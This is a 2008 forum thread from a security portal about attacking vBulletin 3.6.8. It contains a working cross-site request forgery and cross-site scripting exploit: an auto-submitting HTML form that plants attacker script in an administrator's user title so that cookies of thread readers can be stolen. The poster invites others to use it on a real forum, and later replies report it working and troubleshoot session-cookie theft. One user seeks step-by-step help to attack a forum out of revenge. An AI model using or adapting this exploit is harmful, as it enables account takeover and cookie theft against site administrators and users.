Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
August 26, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 251
Members: 0
Total: 251
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> vbulletin 3.6.8 exploit
Post new topic  Reply to topic View previous topic :: View next topic 
vbulletin 3.6.8 exploit
PostPosted: Tue Apr 01, 2008 5:36 pm Reply with quote
akrlot
Beginner
Beginner
 
Joined: Apr 01, 2008
Posts: 4




hello;
does anybody have an exploit for vbulletin 3.6.8?
please pm me. i will use it for bad purposes...
View user's profile Send private message
PostPosted: Tue Apr 01, 2008 8:13 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




I don't see working Xploit for vBulletin v 3.6.8.
View user's profile Send private message
PostPosted: Sat Apr 05, 2008 9:03 am Reply with quote
NEUR0BASHER
Regular user
Regular user
 
Joined: Apr 05, 2008
Posts: 6




Hi!

vBulletin 3.6.8 XSRF/XSS Vulnerability
vBulletin Version: 3.6.8 Patch Level x and possible lower

As administrators can use html in the usertitle an attacker can update the profile of an administrator by sending a link to a site with a code like this:

Code:
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile";
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>


If the attacker sends a link to the admin (in a pm for example) the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread.


Is anyone interested to try this exploit with me on a particular forum? I know one forum that has enabled html entities would be easy to gain admin access.

cheers
neuro
View user's profile Send private message
PostPosted: Sun Apr 06, 2008 4:28 am Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




Very nice, it's working great for me Smile

I'm having a problem saving the cookie though, I'm just using document.cookie and it isn't getting bbsessionhash. It's only getting bblastvisit and bblastactivity. What's going on?

Also it looks like you need have the html page on the same domain as the forum, or it won't accept it as it's not on the whitelist.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Tue Apr 08, 2008 6:13 pm Reply with quote
NEUR0BASHER
Regular user
Regular user
 
Joined: Apr 05, 2008
Posts: 6




gibbocool wrote:
it isn't getting bbsessionhash. It's only getting bblastvisit and bblastactivity. Also it looks like you need have the html page on the same domain as the forum, or it won't accept it as it's not on the whitelist.

Hi! That's extactly the problem: You won't get the bbsessionhash with the cookie as the php skript must run on the same server as the vbulletin software (see: http://www.waraxe.us/ftopict-2506.html ).

It will only work this way: The php code must be embedded into site admin's user title:
Quote:
the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread
View user's profile Send private message
PostPosted: Sat May 24, 2008 5:37 am Reply with quote
aquadeluxe
Regular user
Regular user
 
Joined: Jan 03, 2008
Posts: 11




I am trying to use this. I have gotten everything working for what I want, but when I try to execute it, it says the server doesn't allow POST through my server due to it not being in a whitelist. As I do not know the whitelist, I uploaded the file as a doc on the forum, then I used readfile() in PHP and set the header as HTML and it wouldn't work correctly. Pretty much what I need to do is load the "doc" file as an HTML file on there server. Is there any way of doing that?
View user's profile Send private message
PostPosted: Sat May 24, 2008 12:59 pm Reply with quote
gibbocool
Advanced user
Advanced user
 
Joined: Jan 22, 2008
Posts: 208




aquadeluxe wrote:
I am trying to use this. I have gotten everything working for what I want, but when I try to execute it, it says the server doesn't allow POST through my server due to it not being in a whitelist. As I do not know the whitelist, I uploaded the file as a doc on the forum, then I used readfile() in PHP and set the header as HTML and it wouldn't work correctly. Pretty much what I need to do is load the "doc" file as an HTML file on there server. Is there any way of doing that?

If there was a way of doing that it would make life very easy.

If the forum has html enabled you could just put the xss code in a post.

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Mon Jun 16, 2008 12:57 pm Reply with quote
Messenger_of_Death
Beginner
Beginner
 
Joined: Jun 16, 2008
Posts: 2




How can i hack ...


Last edited by Messenger_of_Death on Tue Jun 17, 2008 8:18 am; edited 1 time in total
View user's profile Send private message
PostPosted: Mon Jun 16, 2008 10:58 pm Reply with quote
tr0nix
Active user
Active user
 
Joined: Mar 06, 2008
Posts: 48




Messenger_of_Death wrote:
How can i hack *CENSORED*


man, read the damn rules!
no sites / ips!
View user's profile Send private message Send e-mail
PostPosted: Tue Jun 17, 2008 8:19 am Reply with quote
Messenger_of_Death
Beginner
Beginner
 
Joined: Jun 16, 2008
Posts: 2




Sorry man...
View user's profile Send private message
PostPosted: Mon Oct 20, 2008 12:16 am Reply with quote
TDawg
Beginner
Beginner
 
Joined: Oct 20, 2008
Posts: 2




NEUR0BASHER wrote:
Hi!

vBulletin 3.6.8 XSRF/XSS Vulnerability
vBulletin Version: 3.6.8 Patch Level x and possible lower

As administrators can use html in the usertitle an attacker can update the profile of an administrator by sending a link to a site with a code like this:

Code:
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile";
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>


If the attacker sends a link to the admin (in a pm for example) the admin's usertitle will be updated and contains the new code of the attacker now. The code will be executed as soon as the admin has submitted a new posting. Now the attacker can steal the cookies of user's who are reading the thread.


Is anyone interested to try this exploit with me on a particular forum? I know one forum that has enabled html entities would be easy to gain admin access.

cheers
neuro


Could someone give me a step by step on this.... It would be a great help... This forum that I want to use this on are total pricks and the owner of the site totally bashed a good great of mine for no reason at all.....AND I WANT TO GET EVEN !!!!! Please help
View user's profile Send private message
PostPosted: Mon Aug 03, 2009 3:01 am Reply with quote
mRnOnAmEv
Beginner
Beginner
 
Joined: Aug 02, 2009
Posts: 2




Has anyone got this to work on 3.6.8?
View user's profile Send private message
vbulletin 3.6.8 exploit
  www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






It book reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.092 Seconds